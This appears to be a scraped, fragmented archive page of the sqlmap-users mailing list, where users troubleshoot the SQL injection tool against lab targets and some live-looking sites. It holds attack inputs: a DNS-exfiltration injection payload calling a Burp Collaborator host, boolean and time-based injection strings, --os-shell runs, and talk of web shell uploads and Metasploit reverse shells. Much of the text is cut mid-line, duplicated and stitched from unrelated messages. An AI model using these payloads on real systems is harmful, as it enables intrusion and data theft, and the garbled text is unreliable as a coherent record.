Hi,
Am trying to fetch a database name through sql injection but keep getting a
gibberish name/information.
Has anyone encountered this kind of problem and if yes, how did you resolved
it.
Kindly find below the screenshot.
---
>> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ ?
>> www.testsite.org <http://www.testsite.org/>. (30)
>> 16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A
>> 173.213.231.200 (46)
>> 16:58:04.079921 IP 8.8.8.8.53 > 97.8
7.91.210.56778: 15627 0/1/0 (117)
>> 16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A?
>> www.testsite.org. (30)
>> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ ?
>> www.testsite.org. (30)
>> 16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/
.testsite.org>. (30)
16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A
173.213.231.200 (46)
16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)
It doesn't seem like an injection pattern is being tried that is getting the
DNS exfiltration to occur...
1/0/0 A
>> 173.213.231.200 (46)
>> 16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117)
>> 16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A?
>> www.testsite.org. (30)
>> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA?
>&
16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A
> 173.213.231.200 (46)
> 16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117)
> 16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A?
> www.testsite.org. (30)
> 16:59:09.078623 IP 97.87
.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A
173.213.231.200 (46)
16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)
It doesn't seem like an injection pattern is being tried that is getting the
DNS exfiltration to occur... or else I'm doing something else wrong.
Thanks,
V
_
I would suggest you to run the wireshark or similar when running the
--dns-domain to properly debug what is going on. There could be really lots
of problems before you fine tune it (e.g. other service running on :53).
About the "forcing" sqlmap for using dns-exfil. It will always at least try
to t
I have a situation where Burp has detected the following DNS exfiltration
injection for a query parameter in a web app:
GET
//Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20ma
Hi.
My 2 cents:
"sqlmap - security development in Python"
http://www.slideshare.net/stamparm/euro-python-2011miroslavstamparsqlmapsecuritydevelopmentinpython
"DNS exfiltration using sqlmap"
http://www.slideshare.net/stamparm/dns-exfiltration-using-sqlmap-13163281
"sqlmap - Under the Hood"
http:
Hello,
I just found that sqlmap doesn't have a Wikipedia article. I could cook
up some small stub, but I could use some references so that it doesn't
get remove because of no proven article notability. Could you provide me
with links to presentations, papers and other proofs of sqlmap
notability t
>> version 6.0.1. You can
>>>>>> try it your self by using
>>>>>>
>> version 6.0.1. You can
>>>>>> try it your self by using
>>>>>>
gt;>> info on vulnerable environment (e.g. just a plain Webgoat, URL this
>>>>>>>>> and
>>>>>>>>> that)?
>>>>>>>>>
>>>>>>>>> Bye
>>>>>>>>>
>>>&g
file, so I can't see any
>>>>>>>>> logs.
>>>>>>>>> I will try to see some logs from inside the application. Anyway, I
>>>>>>>>> didn't expect this application to contain any kind of filtering.
>>>>>
HTTP/1.1
>>>>> >> Host: localhost:8080
>>>>>
n't expect this application to contain any kind of filtering.
>>>>>>>> I hope to show Sqlmap in action to some people from a large company
>>>>>>>> and
>>>>>>>> I wanted to use something simple, therefore I am quite surprised. I
>>>>>&
t;> >> Accept-Language: cs,en-US;q=0.7,en;q=0.3
>>>> >> Accept-Encoding: gzip, deflate
>>>> >> Content-Type:
>>>>
ncoding: gzip, deflate
>>>> >> Content-Type:
>>>>
ou should look in the logs of the web server and see what they
>>>>>>> say.
>>>>>>> >
>>>>>>> > I bet you need --tamper=bet
t;>>>> >>
>>>>>> >> Greetings,
>>>>>> >> I tried to verify Sqlmap's functionality by r
>> Content-Length: 29
>>> >> Cookie: JSESSIONID=replace
>>>
> >> Content-Length: 29
>>> >> Cookie: JSESSIONID=replace
>>>
ing it against
>>>>> Webgoat
>>>>> >> version 6.0.1. You can try it your self by using following request
>>>>> file.
>>>>> >> Just log in and replace cookie by valid one.
>>>>> >> ###start request file
>>>
>> >> Cookie: JSESSIONID=replace
>> >> Connection: keep-alive
>> >> Pragma: no-cache
>> >> Cache-Control: no-cache
>> >>
>> >> account_number=101&SUBMIT=Go!
>> >> #end request file
>> >> I am running git master of Sqlmap.
>> >>
Host: localhost:8080
>>>> >> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:41.0) Gecko/20100101
>>>> >> Firefox/41.0
>>>> >> Accept: */*
>>>> >> Accept-Language: cs,en-US;q=0.7,en;q=0.3
>>>> >> Accept-Encodi
; Accept-Encoding: gzip, deflate
>>> >> Content-Type: application/x-www-form-urlencoded; charset=UTF-8
>>> >> X-Requested-With: XMLHttpRequest
>>> >> Referer: http://localhost:8080/WebGoat/start.mvc
>>> >> Content-Length: 29
>>
t/start.mvc
>> >> Content-Length: 29
>> >> Cookie: JSESSIONID=replace
>> >> Connection: keep-alive
>> >> Pragma: no-cache
>> >> Cache-Control: no-cache
>> >>
>> >> account_number=101&SUBMIT=Go!
>> >>
>> >> Content-Length: 29
>> >> Cookie: JSESSIONID=replace
>> >> Connection: keep-alive
>> >> Pragma: no-cache
>> >> Cache-Control: no-cache
>> >>
>> >> account_number=101&SUBMIT=Go!
>> >>
> >> account_number=101&SUBMIT=Go!
> >> #end request file
> >> I am running git master of Sqlmap.
> >> Sqlmap detects SQL injection (boolean based blind Mysql), but no
> >> information gathering commands work (--dbs, --current-user...).
> I tried
> >> running with --he
am running git master of Sqlmap.
>> >> Sqlmap detects SQL injection (boolean based blind Mysql), but no
>> >> information gathering commands work (--dbs, --current-user...). I tried
>> >> running with --hex or --no-cast, but no luck.
>> >> What might
(--dbs, --current-user...). I tried
> >> running with --hex or --no-cast, but no luck.
> >> What might be the problem?
> >> Thanks,
> >> Vojta
> >>
> >>
> --
>
but no
>>> information gathering commands work (--dbs, --current-user...). I tried
>>> running with --hex or --no-cast, but no luck.
>>> What might be the problem?
>>> Thanks,
>>> Vojta
>>>
>>> ---
gt; Thanks,
>> Vojta
>>
>> ------
>> ___
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
--
___
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
___
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
--
___
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
Greetings,
I tried to verify Sqlmap's functionality by running it against Webgoat
version 6.0.1. You can try it your self by using following request file.
Just log in and replace cookie by valid one.
###start request file
POST /WebGoat/attack?Screen=4&menu=1100 HTTP/1.1
Host: localhost:8080
User-Ag
Can you please go to the "sqlmap/extra/beep" and from there run the:
python -vv beep.py > /tmp/run.txt 2>&1
...and send me back the content of file /tmp/run.txt ?
Bye
On Sun, Jul 19, 2015 at 4:42 PM, Vojtěch Polášek wrote:
> Hi,
> I am running latest Sqlmap from Git and I am receiving SigSegv
Hi,
I am running latest Sqlmap from Git and I am receiving SigSegv while
using --beep parameter.
I don't know what other information I should provide. Without --beep,
everything is working as expected.
Please feel free to ask me for more info.
Thanks,
Vojta
Not able to reproduce. Can you please send the complete output of -v 3
(even the "executing local command" parts). It seems that you are either
getting the binary shellcodeexec payload (I am getting the alphanum in both
msfvenom and non-msfvenom environment) or the remote path contains
non-ASCII ch
Got another error when trying to use the metasploit reverse shell option
either default shell or Meterpreter, below the run:
which payload do you want to use?
[1] Shell (default)
[2] Meterpreter (beta)
> 1
[22:36:39] [DEBUG] executing local command:
/usr/share/metasploit-framework/msfvenom -p linu
That was fast! Thanks Miroslav. Great tool!
On Sat, Jul 4, 2015 at 4:47 PM, Miroslav Stampar wrote:
> Thank you for your report. Fixed with the latest revision (
> https://github.com/sqlmapproject/sqlmap/issues/1290)
>
> Bye
>
> On Sun, Jul 5, 2015 at 1:16 AM, Danux wrote:
>
>> With yours is no
Thank you for your report. Fixed with the latest revision (
https://github.com/sqlmapproject/sqlmap/issues/1290)
Bye
On Sun, Jul 5, 2015 at 1:16 AM, Danux wrote:
> With yours is not throwing the error, you can reproduce my case with the
> owasppractice examples, I am attaching the source code h
Something is really wrong happening here. One user is having the identical
problem like you (AttributeError: 'NoneType' object has no attribute
'replace') and I am not able to reproduce.
Can you please rerun your sqlmap version with "
http://testphp.vulnweb.com/artists.php?artist=1"; and tell me i
Just clone git and got 1.0-dev-166dc98 version but got a unhandled
exception error:
./sqlmap.py -u
http://OwaspPractice/injection/lessons/lesson03/index.php?code=N --os-shell
--prefix "\")" --flush-session -v3
/sqlmap'. If the exception persists, please open a new issue at '
https://github.com/s
I believe that you are using an old revision. For a long time there is at
least a git revision or a pseudo "non-git" number appearing when "sqlmap
--version" is being used.
Please update to the latest revision from the official github repository
and rerun the sqlmap.
Bye
On Sun, Jul 5, 2015 at 1
Thanks
sqlmap --version
sqlmap/1.0-dev
In the meantime I will patch procs/mysql/write_file_limit.sql
On Sat, Jul 4, 2015 at 3:40 PM, Miroslav Stampar wrote:
> Which revision/version of sqlmap do you use? There has been a related
> patch a month ago. Will check tomorrow.
>
> Bye
>
> On Sun,
Which revision/version of sqlmap do you use? There has been a related patch
a month ago. Will check tomorrow.
Bye
On Sun, Jul 5, 2015 at 12:33 AM, Danux wrote:
> Hello list, there is an issue with sqlmap when using the --os-shell option
> in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (D
Hello list, there is an issue with sqlmap when using the --os-shell option
in version sqlmap/1.0-dev and MySQL: 5.5.35-0+wheezy1 (Debian)
Description:
A specific PAYLOAD (see below) used to upload a web shell will create an
empty file e.g. tmpbezff.php, this will cause that every subsequent PAYLO
Hi.
If you are using only GET parameters to pass arguments to your web
application then you could manually find all different links on your web
site containing parameters. Then you should pass those to sqlmap (e.g. by
enlisting them line by line in a file and using option -m to pass such file
to s
Hi All,
I am doing some security tests on a web application and I decided to test
sqlmap for the first time. From the tutorial post I understood that we need
to pass a target URL to Sqlmap. But I am not getting, how to get a
vulnerable URL from our website. Do I need to traverse all the pages o
Hi.
Sending you a sample run from my machine with the latest revision:
---
stamparm@Laptop:~/Dropbox/Work/sqlmap$ pwd
/home/stamparm/Dropbox/Work/sqlmap
stamparm@Laptop:~/Dropbox/Work/sqlmap$ ll /tmp/request.txt
-rw-r--r-- 1 stamparm stamparm 327 Jun 18 11:33 /tmp/request.txt
stamparm@Laptop:~/D
Hi,
thank you very much, it works.
I have another question. Sqlmap can't work with relative paths when
using -r or -c switch for loading requests or config files. Maybe this
is true for other switches, but I can confirm it here. It just says that
file was not found. It works only with absolute path
Hi Vojtěch.
Can you please update and try it now?
Bye
On Mon, Jun 15, 2015 at 11:59 AM, Vojtěch Polášek wrote:
> Hi,
> I am testing an application, which works in this way:
> You send a request as a POST request and application returns 302 Found.
> Web browser uses location field to send a GET
Hi,
I am testing an application, which works in this way:
You send a request as a POST request and application returns 302 Found.
Web browser uses location field to send a GET request for updated site.
When I test this with Sqlmap, it asks me whether I want to follow 302
redirect (I answer yes) and
I tried that with a custom mark for --data. My point I need to hit is the
RemotingMessage AMF object with the data Params of "RemoteUsername=null"
and "RemotePassword=null" this triggers the exception by hand. I'm trying
to figure out if I can get sqlmap to do this. It's not looking like it.
*"143
@Brandon Excellent. Very well done sir... Seeing if maybe I can do
something like this.
Thanks.
Chris.
On Fri, May 29, 2015 at 7:01 AM, wrote:
> Send sqlmap-users mailing list submissions to
> sqlmap-users@lists.sourceforge.net
>
> To subscribe or unsubscribe via the World Wide Web, vis
HELLO sqlmap team
I AM NAJEEB CHOUDHARY FROM INDIA. I HAVE SOME
ISSUE USING SQLMAP V1-DEV,
I AM TRY TO USE WAF SCRIPT IN SQLMAP, JUST
LIKE TAMPER SCRIPT. IF YOU EMAIL
ME SAME EXAMPLE IT HELPFUL FOR ME.
--
Dive in
Hey Guys,
I got things to about as good as I am going to get them for this Web GUI
front end and have made things available to public via my Github page for
anyone interested, project code can be found here:
https://github.com/Hood3dRob1n/SQLMAP-Web-GUI
I also made a relatively simple blog postin
Oh nevermind, I was using an HTTP request loaded from a file, but using the
-u parameter seems to work fine.
Thanks anyway.
2015-02-19 22:38 GMT+01:00 Loïc THOMAS :
> Hi.
>
> SQLmap wouldn't detect an injection though manually it works perfectly.
> It is on a post request.
>
> Using this value wi
Hi.
SQLmap wouldn't detect an injection though manually it works perfectly.
It is on a post request.
Using this value will display the page :
id=75102' and (select user()) ='root@localhost' #
Replacing 'root' by anything else won't work (except for the same in
uppercase, it seems the charset is
Hello.
I wonder if SQLMAP support vulnerable sites to "Time-Based Blind SQL Injection
using Heavy Queries" ???
For example:
//
informatica64.com/blind2/pista.aspx?id_pista=1
and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers
as sys3, sysusers AS sys4, sysusers AS sy
Hi.
Thank you for your report and find it fixed now.
Kind regards,
Miroslav Stampar
On Wed, Oct 22, 2014 at 9:53 PM, Seb wrote:
> [19:49:15] [CRITICAL] unhandled exception occurred in
> sqlmap/1.0-dev-nongit-20141022. It is recommended to retry your run with
> the latest development version fr
[19:49:15] [CRITICAL] unhandled exception occurred in
sqlmap/1.0-dev-nongit-20141022. It is recommended to retry your run with
the latest development version from official GitHub repository at
'https://github.com/sqlmapproject/sqlmap'. If the exception persists,
please open a new issue at
'htt
Hi everybody,
if I pass a PUT request via "-r" to sqlmap, it will send requests to the
server using POST.
1. Is this intended?
2. If yes, is there a way to switch it off?
Thanks in advance!
Dennis
--
Comprehensive Server
You have a reduced version of Python, commonly a result of custom build.
Please get the official build to get everything up and running.
Bye
On Oct 16, 2014 2:27 AM, "FLO" wrote:
> Hey,
> When i want to start sqlmap, i type in "python sqlmap.py", and when i do
> this, i get following error messa
Hey,
When i want to start sqlmap, i type in "python sqlmap.py", and when i do
this, i get following error message:
"missing one or more core extensions ('gzip' , 'ssl' , 'sqlite' ,
'zlib') most probably because current version of Python has been built
without appropriate dev packages (e.g. 'libs
Both are secure if you know what are you doing. Also, --tor should work out
of box if you have a Tor bundle installed (e.g. Vidalia)
Bye
On Oct 13, 2014 8:35 PM, "FLO" wrote:
> Hey,
> I am curious about the security level of sqlmap.. is it more secure to
> use --tor or --proxy?
> And is it enoug
Hey,
I am curious about the security level of sqlmap.. is it more secure to
use --tor or --proxy?
And is it enough to write --tor, when my tor generally is configured well?
Or do i have to specifiy in sqlmap an specific socks?!
Thx for an answer,
Flo
---
Diese E-Mail ist frei von Viren und Malwar
You are most probably running the old version of sqlmap (installed on your
system via system repository).
Please do this:
1) cd /tmp
2) git clone https://github.com/sqlmapproject/sqlmap.git
3) cd /tmp/sqlmap
4) python sqlmap.py
Bye
On Sun, Oct 12, 2014 at 9:45 PM, FLO wrote:
> Hey Guys,
> I u
Sync the last sqlmap version.
Cheers
2014-10-12 20:45 GMT+01:00 FLO :
> Hey Guys,
> I use sqlmap 0.9 at freebsd 10.0 system, and i have the problem, that in
> my shell: when i run the command "sqlmap" there is no color highlighting!
> I only have black letters, and white background. Normally i ha
Hey Guys,
I use sqlmap 0.9 at freebsd 10.0 system, and i have the problem, that in
my shell: when i run the command "sqlmap" there is no color highlighting!
I only have black letters, and white background. Normally i have colours
in my shell!
So what to do? And also: I dont know why, but i cant s
http://sourceforge.net/p/sqlmap/mailman/sqlmap-users/thread/51e205b9.8020...@gmail.com/
Bye
On Tue, Sep 30, 2014 at 10:39 AM, Ogunwede Stephen
wrote:
> Hello,
> I installed smtpmap, but it keeps disappearing each time i press enter.
>
> Also i have this error on it
>
> sqlmap: error: missing a
Hello,
I installed smtpmap, but it keeps disappearing each time i press enter.
Also i have this error on it
sqlmap: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c,
--wizard, --update, --purge-output or --dependencies), use -h for
basic or -hh for advanced
My operating system is 3
Thanks!
17.09.2014, 12:19, "Miroslav Stampar" :
> Fixed with
> https://github.com/sqlmapproject/sqlmap/commit/ffa7e2f6e905a5bd0aeab98b51f512529e5024e0#diff-ee248665d16721810ef658a78e5d83a2
>
> On Sun, Sep 14, 2014 at 7:29 PM, bockor wrote:
>> sqlmap version: 1.0-dev
>> Python version: 2.7.6
>> O
Hi Nedko.
Thank you for your report. It should be fixed now.
Bye
On Wed, Sep 17, 2014 at 9:09 AM, Nedko Hristov wrote:
> Hi guys. I try to run SQL Map against company's script that I'm testing
> and I got next error message with the uname -a and errors on exit:
>
>
> root@nedko:/var/www/sqlmap
Hi guys. I try to run SQL Map against company's script that I'm testing
and I got next error message with the uname -a and errors on exit:
root@nedko:/var/www/sqlmap# python sqlmap.py --sqlmap-shell
sqlmap-shell> -u
"http://192.168.0.50/blog/install/index.php?controller=pjLoad&action=pjActionVi
Fixed with
https://github.com/sqlmapproject/sqlmap/commit/ffa7e2f6e905a5bd0aeab98b51f512529e5024e0#diff-ee248665d16721810ef658a78e5d83a2
On Sun, Sep 14, 2014 at 7:29 PM, bockor wrote:
> sqlmap version: 1.0-dev
> Python version: 2.7.6
> Operating system: posix
> Command line: ./sqlmap.py --beep -
sqlmap version: 1.0-devPython version: 2.7.6Operating system: posixCommand line: ./sqlmap.py --beep --page-rank --batch --tor --threads=5 --random-agent -g Technique: NoneBack-end DBMS: None (identified)Traceback (most recent call last): File "./sqlmap.py", line 95, in main
; ___
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
------
__
I also get "it looks like the file has not been written, this can occur if
the DBMS process' user has no write privileges in the destination path" when
I try to read and write a file to the destination path on the DBMS. So the
question now is, how to make the destination path
/var/www/dvwa/hack
Brandon Perry writes:
>
>
> Can you write to /tmp?
>
> Pick a directory you KNOW you should be able to write to, and ensure you
can write to that first.
>
> Also, maybe SELinux/AppArmor are getting in the way.
>
>
> On Fri, Aug 15, 2014 at 9:52 AM, Omara wrote:
> Brandon Perry ...> write
Can you write to /tmp?
Pick a directory you KNOW you should be able to write to, and ensure you
can write to that first.
Also, maybe SELinux/AppArmor are getting in the way.
On Fri, Aug 15, 2014 at 9:52 AM, Omara wrote:
> Brandon Perry writes:
>
> >
> >
> > Can you write to /tmp?
> > Instea
Brandon Perry writes:
>
>
> Can you write to /tmp?
> Instead of chowning the directory, just chmod -R 777 the dir you want to
write the payload to, that's how many docs on the internet tell people to
make an upload directory, for instance, writable by the web server.
>
> Of course, this is i
Can you write to /tmp?
Instead of chowning the directory, just chmod -R 777 the dir you want to
write the payload to, that's how many docs on the internet tell people to
make an upload directory, for instance, writable by the web server.
Of course, this is incorrect, but it's definitely easier th
Brandon Perry writes:
>
>
> Does the mysql user have write permissions on the web server? A properly
configured web server where chown www-data:www-data was done, as opposed to
chmod 777 on the web dir, which is an improper configuration, will not allow
the mysql user to write to the web root.
Does the mysql user have write permissions on the web server? A properly
configured web server where chown www-data:www-data was done, as opposed to
chmod 777 on the web dir, which is an improper configuration, will not
allow the mysql user to write to the web root.
On Wed, Aug 13, 2014 at 6:47
I can't get to upload the stager file on the OWASPbwa document root
(/var//WackoPicko/users). I am not sure how to troubleshoot this issue.
Any help on the issue will be appreciated. Thank you.
root@kali:~# sqlmap -u "http://192.168.0.8/WackoPicko/users/login.php";
--data "username=hacker&pass
Hi,when running sqlmap get the following message
[18:31:06] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with
the latest development version from the GitHub repository. If the exception per
sists, please send by e-mail to 'sqlmap-users@lists.sourceforge.net' or open a n
ew i
Hi.
Most probably a false positive.
Bye
On Sat, May 3, 2014 at 11:02 PM, Dev <1240635...@qq.com> wrote:
> I can't figure out why this happens
>
>
>
>
> root@pk:~# sqlmap -u "http://www.net/m_view.php?ps_db=notice&ps_boid=149";
> --current-db
>
> sqlmap/1.0-dev-b54651b - automatic SQL injec
I can't figure out why this happens
root@pk:~# sqlmap -u "http://www.net/m_view.php?ps_db=notice&ps_boid=149";
--current-db
sqlmap/1.0-dev-b54651b - automatic SQL injection and database takeover tool
http://sqlmap.org
[*] starting at 05:58:05
[05:58:05] [INFO] resuming back-
Hi.
In majority of cases user can't do anything. It's an usual way how to
mitigate this kind of vulnerabilites (by using low privileged DBMS
accounts).
Kind regards,
Miroslav Stampar
On Mon, Apr 21, 2014 at 4:35 PM, MR Mokhtar wrote:
> Hi
> i have sql injection and i can dump all tables and e
Hi
i have sql injection and i can dump all tables and every thing is ok but
when i try to upload a shell it couldn't !!
sqlmap says cannot write files dude to permissions
now is there any thing i can do to write files to the server?
thanks in advance.
---
Strange thing is that you are not getting anything with --parse-errors as
you are dealing with a "missing database" problem inlined with error-based
technique.
Can you please send a traffic file (if you want you can send it privately
to me) for that same run (where you've used --parse-errors)?
By
Sure. The --parse-errors switch doesn't seem to produce anything
additional? I added -v3 just in case.
--
$ python sqlmap.py ... --dbms=sybase --batch --technique=E --threads=8
--fresh-queries -D ENERGY_MASTER --tables --parse-errors -v3
sqlmap/1.0-dev-59d667d - automatic SQL injection and da
Hi.
Can you please copy/paste the console output you get for sqlmap run with:
python sqlmap.py ... -D ENERGY --tables --parse-errors
Also, for:
python sqlmap.py ... --dbs
Bye
On Mar 25, 2014 7:16 PM, "les paul" wrote:
> Hi all,
>
> I'm running into trouble with sqlmap against a Sybase db. He
Hi all,
I'm running into trouble with sqlmap against a Sybase db. Here's the
fingerprint:
Adaptive Server Enterprise/15.0.3/EBF 17770 ESD#4/P/x86_64/Enterprise
Linux/ase1503/2768/64-bit/FBO/Thu Aug 26 09:54:27 2010
The technique I'm using is error-based through a POST to a vulnerable .aspx
page.
Hi.
That file should be there (in regular installations).
Is there a possibility that you are running a sqlmap from one place and
that you have a sqlmap installed from official repository at the other
place? Simple said, that directory "/usr/share/sqlmap/udf/mysql..." looks
like it's a part of th
Hi.
You are using an ancient version v0.7. Please update to the latest v1.0-dev
from our Github repository.
Bye
On Tue, Nov 26, 2013 at 11:21 AM, Pushpa JL wrote:
> Hi,
>
> I have been using sqlmap plugin with burpsuite for a while
> and from since today afternoon, there is an
please help me
[11:40:19] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run
with the latest development version from the GitHub repository. If the
exception persists, please send by e-mail to '
sqlmap-users@lists.sourceforge.net' or open a new issue at '
https://github.com/sqlmappro
Hi,
I have been using sqlmap plugin with burpsuite for a while and
from since today afternoon, there is an issue. Please find the attachment
enclosed containing the error details of sqlmap. Please resolve the issue as
early as possible. Kindly do the needful.
Regards,
Pushpa JL
1 - 100 of 278 matches
Mail list logo
